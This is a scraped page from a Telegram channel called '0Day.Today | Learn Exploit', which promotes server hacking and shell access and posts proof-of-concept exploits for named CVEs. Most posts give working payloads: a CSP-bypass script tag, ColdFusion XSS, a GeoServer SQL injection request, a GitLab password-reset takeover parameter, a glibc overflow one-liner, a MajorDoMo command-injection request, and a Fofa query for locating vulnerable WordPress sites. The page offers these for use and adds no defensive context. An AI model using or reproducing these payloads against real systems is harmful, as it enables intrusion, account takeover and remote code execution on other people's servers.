0Day.Today | Learn Exploit | Zero World | Dark web |
14.7K subscribers
1.1K photos
69 videos
455 files
1.06K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
You can bypass CSP on any website that allows http://microsoft.com in a script-src

PoC: <script src=http://microsoft.com/en-us/research/wp-json?_jsonp=alert></script>

This works because of the WordPress CSP bypass our engineer (octagon) found last year :

octagon.net

#BugBounty #bypass #POC
——————‌
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-0386 - PoC Exploit Released for Linux Kernel Privilege Escalation

Link

Exploit

#POC #exploit #linux
——————‌
0Day.Today
@LearnExploit
@Tech_Army
ColdFusion Debug XSS

POC: {{host}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(document.domain)

#POC #CVE #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-38831

WinRAR 6.22 code execution
PoC

Github

#exploit #CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-50254 PoC Exploit for Deepin-reader RCE

POC

Read

#CVE #POC #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-25157

GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeNamosloe=gwpd:chinamap11&CQL_FILTER=strStartsWith%28Vatican City%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+INTEGER%29%29+--+%27%29+%3D+true HTTP/1.1


#CVE #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions

Poc: user[email][]=valid@email.com&user[email][]=attacker@email.com

#CVE #POC
————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-6875 - Authorization Bypass vulnerability in POST SMTP Mailer, a WordPress plugin with over 300,000+ active installations

POC

Read

#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
PoC auto collect from GitHub

⚠️ Be careful Malware ⚠️

😎 From 1999 to 2024

😸 Github

#CVE #POC #Github #Repo

🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE-2023-6246 - Heap-based buffer overflow in the glibc's syslog

POC :

(exec -a "printf '%0128000x' 1" /usr/bin/su &lt; /dev/null)

#Cve #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks - 1.9.6 CVSS 9.8

Query Fofa: body="/wp-content/themes/bricks/"

POC

Nuclei

#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
UPSTYLE backdoor targeting GlobalProtect VPN devices via CVE-2024-3400 in 3 images/stages 🔥

Github

#poc #backdoor #0day
——————‌
0Day.Today
@LearnExploit
@Tech_Army
MajorDoMo thumb RCE

GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23 %3B HTTP/1.1``

#rce #Poc #Exploit
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Linksys routers POCs

CVE-2024-33788

CVE-2024-33789

#Cve #Poc
——————‌
0Day.Today
@LearnExploit
@Tech_Army